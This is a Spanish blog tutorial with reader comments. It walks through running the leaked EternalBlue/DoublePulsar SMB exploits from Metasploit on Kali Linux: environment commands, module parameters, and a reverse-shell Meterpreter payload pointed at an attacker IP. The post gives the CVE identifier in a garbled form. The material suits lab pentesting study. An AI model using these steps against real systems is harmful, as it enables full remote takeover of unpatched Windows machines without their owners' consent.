25 Abril, 2017 a las 0:48

Hace algunas semanas se filtró un leak con un arsenal de exploits y herramientas usadas por la NSA. Dicho arsenal incluía entre otras utilidades una serie de herramientas para explotar la vulnerabilidad CVE-2017-010 que afecta a SMB y que no fue parcheada hasta marzo por Microsoft, lo que hace que aún existan muchos equipos vulnerables y la convierte en potencialmente peligrosa.

Es muy importante, si eres administrador de sistemas o usuario final que instales las últimas actualizaciones de Windows para protegerte de estas vulnerabilidades ya que permiten el control remoto total del equipo vulnerable.

Estos exploits se utilizan bajo el propio framework de la NSA, que también se filtró y que tiene como requisitos un equipo Windows con ciertas configuraciones añadidas. Estas peculiaridades unido a que la mayoría de pentesters no estamos familiarizados con dicho framework dan como resultado que no sea una práctica cómoda a pesar de su potencial.

Ahora, la gente de ElevenPaths (@UnaPibaGeek y @pablogonzalezpe) han desarrollado un módulo de Metasploit que permite la ejecución de estos exploits en equipos Linux a través de Metasploit.

Preparar el entorno

Si usas Kali Linux x64 vendrá preparado para usar Wine64, así que el primer paso es configurarlo para que funcione con binarios de 32bits. Aunque este tipo de configuraciones se salen de la temática del blog en mi caso bastó con unos pocos comandos:

dpkg --add-architecture i386 && apt-get update
apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

Descargarmos el repositorio del exploit

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Y movemos el contenido dentro de la carpeta de exploits de metasploit. En mi caso lo dejaré en /usr/share/metasploit-framework/modules/exploits/windows/smb

 

Explotando CVE-2017-010

Como viene siendo habitual, cargaremos metasploit y, en este caso, el exploit con  use exploit/windows/smb/eternalblue_doublepulsar a continuación veremos y explicaremos los diferentes parámetros a configurar con show options:

Los parámetros DOUBLEPULSARPATH y ETERNALBLUEPATH corresponden, como su nombre indica al la ruta donde se encuentran dichos exploits. En nuestro caso como movimos el exploit en  /usr/share/metasploit-framework/modules/exploits/windows/smb la ruta será /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

El parámetro PROCESSINJECT dependerá de si el equipo víctima es 32 o 64 bits. En los equipos 64bits debemos establecer lsass.exe y en los equipos con 32bits debe ser wlms.exe.

El parámetro TARGETARCHITECTURE puede ser x86 o x64, dependiendo obviamente del equipo víctima.

Por último tenemos que establecer en el TARGET la versión de Windows a explotar y el RHOST con la IP de la máquina vulnerable.

A continuación, como es habitual, establecemos nuestro payload favorito, en este caso meterpreter:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Destacar que al estar atacando un equipo 64bits usamos la versión 64bits de meterpreter. En equipos de 32bits usaremos windows/meterpreter/reverse_tcp

Y lo configuramos estableciendo nuestra IP:

set LHOST 11.11.11.129

Ahora solo nos queda lanzar el exploit y esperar la shell.

 

Acerca de Miguel Díaz

Informático, enamorado de la programación, diseño Web y el deporte.
Categorías: Internet, Pentesting, Seguridad, Sin categoría. Etiquetas: , , , , , , , .

12 comentarios en PoC: Explotando CVE-2017-010 con Eternalblue y Doublepulsar desde Metasploit

  1.  Santiago Fernandez dice:

    Miguel, te adjunto un link con un modulo para Scannear si es o no vulnerable el TARGET

  2.  anonimo dice:

    hola muy bueno tu tutorial lo que si te iva adecir que al poner la configuracion como vos explica el tutorial vos pones /usr/share/metasploit-framework/modules/exploits/windows/smb/deps ami me aparecio asi /usr/share/metasploit-framework/modules/exploits/windows/smb/Eternalblue-Doublepulsar-Metasploit/deps esta bien asi?

  3.  anonimo dice:

    hola santiago puse el auxiliar y cuando entro al metasploit me dice esto WARNING! The following modules could not be loaded!(smb_ms17_010.rb)
    alguna solucion

  4.  anonimo dice:

    hola santiago ahy corri como me dijiste y me anduvo ahora falta probar aver si me funciona el exploit …acavo de probar el exploit y probe con otra maquina windows 7 32bits que tengo pero me dice NOT vulnerable con el scanner que dejaste en el link vos y aparte tiene el puerto 445 abierto y no le puse parche ni nada ala maquina windows 7…

    ¿funciona para 32 bits o solo para 64 bits ?

  5.  Santiago Fernandez dice:

    Tenes que hacer un SET de la arquitectura. Por defecto, carga en 64BITS. Hace un Show Options y vas a ver que un apartado habla de esa configuracion.

  6.  anonimo dice:

    si ya probe con x86 y con x64 cambiando con set TARGETARCHITECTURE x64 pero no funciona

  7.  Santiago Fernandez dice:

    Son maquinas virtuales? Debes tener ahi el problema, por la sencilla que tienen filtros o falsos positivo…revisa la configuraciones de networking. Lo mejor que podes hacer es invitar a un amigo jaja!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *